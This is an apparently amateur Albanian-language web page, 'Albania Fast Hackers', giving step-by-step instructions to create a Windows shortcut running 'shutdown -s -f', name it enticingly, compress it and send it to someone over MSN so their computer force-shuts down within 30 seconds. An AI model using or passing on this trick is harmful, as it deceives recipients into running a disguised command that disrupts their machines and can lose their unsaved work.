Albania Fast Hackers
  Fike dikujt pc me fore per 30 sec
 
 

1.kliko dikund ne hapsir te tastin e djatht te mausit

2.new

3.shortcut
4.shutdown -s -f
5.ok
6. ja leni nji emer per ma hanger dikush foren
7. nese don e kompreseon me ja que dikujt per mes msn
8.dhe per 30 sekond pc-se i behete shutdown........
(mos e provo ne pc tande sepse mun me ta fik pc ...
 

 
  Heute waren schon 3 visitors (49 hits) hier!  
 
=> Do you also want a homepage for free? Then click here! <=